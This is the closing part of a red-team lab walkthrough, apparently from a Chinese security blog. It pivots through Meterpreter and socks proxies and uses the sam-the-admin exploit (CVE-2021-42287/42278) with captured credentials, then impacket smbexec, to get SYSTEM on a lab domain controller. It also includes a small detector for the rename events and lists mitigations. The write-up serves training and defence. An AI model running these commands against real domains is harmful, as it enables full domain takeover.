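# benign domain join for contrast.
SAMPLE_EVENTS = [
    {"id": 4741, "subject": "REDTEAM\\root", "target": "SAMTHEADMIN-34$"},
    {"id": 4781, "subject": "REDTEAM\\root", "old": "SAMTHEADMIN-34$", "new": "dc"},
    {"id": 4781, "subject": "REDTEAM\\root", "old": "dc", "new": "SAMTHEADMIN-34$"},
    {"id": 4741, "subject": "REDTEAM\\svc_join", "target": "WS-0042$"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['event_id']} by {f['subject']}: {f['reason']}")
```

The first 4741 in the sample is not flagged on its own: creating a machine account is exactly what ms-DS-MachineAccountQuota (10 by default, as the tool output below confirms) allows any domain user to do, which is why setting that attribute to 0 and applying the November 2021 domain controller updates are the two mitigations that matter here; the rename events are what the detector catches.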

First add a route in MSF

meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 10.0.0.0/255.255.255.0
Local subnet: 10.0.1.0/255.255.255.0
......
meterpreter > run autoroute -s 10.0.0.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.0.0/255.255.255.0...
[+] Added route to 10.0.0.0/255.255.255.0 via 10.0.1.7
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.0.0           255.255.255.0      Session 2

Start another MSF socks5 proxy

msf6 > use auxiliary/server/socks_proxy
# use port 1081, because 1080 is already taken by frp's socks5 proxy
msf6 auxiliary(server/socks_proxy) > set srvport 1081
msf6 auxiliary(server/socks_proxy) > run

Edit the proxychains4 configuration file

vim /etc/proxychains4.conf
# append at the bottom:
socks5 172.20.4.153 1081

Download the EXP: https://github.com/WazeHell/sam-the-admin

Use the domain user credentials captured earlier with the EXP over socks5

proxychains4 python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:389  ...  OK
[-] WARNING: Target host is not a DC
[*] Selected Target dc.redteam.lab
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Current ms-DS-MachineAccountQuota = 10
[*] Adding Computer Account "SAMTHEADMIN-34$"
[*] MachineAccount "SAMTHEADMIN-34$" password = JS6Kp%FldoHZ
[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:135  ...  OK
[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:445  ...  OK
[*] Successfully added machine account SAMTHEADMIN-34$ with password JS6Kp%FldoHZ.
[*] SAMTHEADMIN-34$ object = CN=SAMTHEADMIN-34,CN=Computers,DC=redteam,DC=lab
[*] SAMTHEADMIN-34$ sAMAccountName == dc
[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:88  ...  OK
[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:88  ...  OK
[*] Saving ticket in dc.ccache
[*] Resting the machine account to SAMTHEADMIN-34$
[*] Restored SAMTHEADMIN-34$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*]     Requesting S4U2self
[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:88  ...  OK
[*] Saving ticket in Administrator.ccache
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:445  ...  OK
[-] The NETBIOS connection with the remote host timed out.
[*] You can deploy a shell when you want using the following command:
[$] KRB5CCNAME='Administrator.ccache' /usr/bin/impacket-smbexec -target-ip 10.0.0.12 -dc-ip 10.0.0.12 -k -no-pass @'dc.redteam.lab'

No shell was obtained directly, but the tool printed a hint at the end.

Set the Kerberos credential cache to Administrator.ccache,

then use impacket's smbexec to get a shell

# import the credential
export KRB5CCNAME=Administrator.ccache
# get a shell
proxychains4 python3 smbexec.py -target-ip 10.0.0.12 -dc-ip 10.0.0.12 -k -no-pass @'dc.redteam.lab'

That gives SYSTEM on the domain controller; read the flag on the desktop

type c:\users\administrator\desktop\flag.txt

With that, every machine in the lab has been taken.

04

Lab Summary

The shell obtained from the external entry point via CVE-2021-44228 Log4j2 RCE landed inside a Docker container. In that situation one can first try the usual Docker escape methods, or gather information from the current environment and see whether anything useful turns up. Here, a leaked username and password allowed an SSH login to the host and root privileges, and the external host then served as the pivot into the internal network. Attacking MS17-010 had one snag: through the proxy provided by MSF's socks_proxy module the WIN7 shell could not be obtained, and in the end the socks5 tunnel built with frp is what brought the host into MSF. The domain controller fell to the CVE-2021-42287 & CVE-2021-42278 combination, using the EXP from GitHub for a one-shot shell.

Originally published on the WeChat public account XiAnG学安全: 内网靶场 | 渗透攻击红队内网域渗透靶场-2

Posted by admin on 2024-03-27 22:29:54. Source link (CN-SEC中文网): http://cn-sec.com/archives/2608631.html